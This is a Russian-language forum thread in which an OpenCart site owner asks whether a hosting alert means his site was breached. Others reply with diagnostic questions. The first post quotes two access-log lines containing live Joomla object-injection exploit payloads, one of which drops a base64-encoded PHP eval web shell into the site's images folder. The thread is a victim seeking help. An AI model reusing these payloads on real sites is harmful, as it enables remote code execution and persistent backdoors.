Взлом?

Тема в разделе "Обо всём", создана пользователем DobriyDed, 2 фев 2016.

  1. DobriyDed

    DobriyDed Новичок

    Сообщения:
    9
    Симпатии:
    0
    Добрейшего дня!

    Сегодня пришло письмо от хостера :
    Бла-бла-бла Вредоносный контент! Бла-бла-бла
    /home/*****ru/logs/*****.ru-
    Jan-2016.gz: PHP.HostComm.#239333.PHP.BackDoor.remote.exec.inj.1.UNOFFICIAL
    Это как бы лог файл хостера :)

    Покопавшись нашел лишь два подозрительных момента (повторяются несколько десятков раз, см. в конце сообщения)

    Посему вопросы
    - "А был ли мальчик?"
    - Что за PHP.HostComm.#239333, вернее какие признаки наличия этой уязвимости? Может не то в логах смотрел?
    - Если все же был взлом, что могли поломать/спереть?
    - Есть ли актуальная инфа о текущих уязвимостях Opencart по типу http://www.waraxe.us/advisory-84.html Ю но более свежая 2.1.X.X+ ?
    - Со стандартным .htaccess в корне что то дополнительно надо сделать?
    например, magic quotes отрубать? Они включены почему то

    Логи спрятаны. Админка спрятана, .htaccess в ней прописан на мои IP .

    Заранее благодарю!


    ------------------------------------------------------------------------------
    4094 188.165.242.205 - - [08/Jan/2016:17:55:19 +0300] "POST / HTTP/1.1" 503 315 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:162:\"eval(chr(101).chr(99).chr(104).chr(111).chr(34).chr(120).chr(121).chr(105).chr(110).chr(105).chr(122).chr(100).chr(97).chr(34).chr(59));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\\xf0\\xfd\\xfd\\xfd"

    17178 91.207.6.18 - - [14/Jan/2016:12:39:34 +0300] "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/images/al277.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 404 24451 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
     
  2. Vlad

    Vlad Эксперт

    Сообщения:
    3.943
    Симпатии:
    946
    1. Это не ошибка движка
    2. Модули с варезопомоек все с вирусами и бекдорами. Устанавливали?
    3. Какой файл заражен?
    4. Какой хостер.
    5. Комп чист без вирусов?
    6. Проги на компе купленные или как всегда с скаченные на халяву?
    7. ...... остальные подхватят добавят вопросы..
     
  3. DobriyDed

    DobriyDed Новичок

    Сообщения:
    9
    Симпатии:
    0
    2. Модули - только штатные + 2 модуля в темплейте ( http://themeglobal.com/opencart/themegloballite/ ) Качан c сайта создателей, не с помойки.
    3. В том то и дело что хостинг нашел только один признак зловреда - в СВОЕМ файле логов. В файлах сайта по их мнению чисто
    4. Хостер HC.RU Уже лет 5 с ними знаком, бывают и ложные тревоги , даже по дырявой джумле была пара "ложняков"

    5. и 6. - виртуалка , винда, антивирь, firefox, filezilla, notepad++, Gimp .
    Кстати, просто для инфы, обычная винда, в не зависимости от способа активации, содержит такое количество дыр, что мама не горюй. Но это лирика :)

    P.S. пока ни на один из вопросов моего поста ответа нет
     
  4. Vlad

    Vlad Эксперт

    Сообщения:
    3.943
    Симпатии:
    946
    ))) тогда наверно с них нужно требовать чтобы проверили что такое. Хостинги тоже дырявые бывают.
    Хостеры по логу должны ответить, что это такое было.
     
  5. DobriyDed

    DobriyDed Новичок

    Сообщения:
    9
    Симпатии:
    0
    Спасибо!

    Осталось два момента:
    - Есть ли актуальная инфа о текущих уязвимостях Opencart по типу http://www.waraxe.us/advisory-84.html , но более свежая 2.1.X.X+ ?
    - Со стандартным .htaccess в корне что то дополнительно надо сделать?
    например, magic quotes отрубать? Они включены почему то
     
  6. c0dex

    c0dex Новичок

    Сообщения:
    12
    Симпатии:
    2
    Может кто-то пытался оформить заказ или оставить комментарий к товару а в тексте была какая-то подозрительная хрень?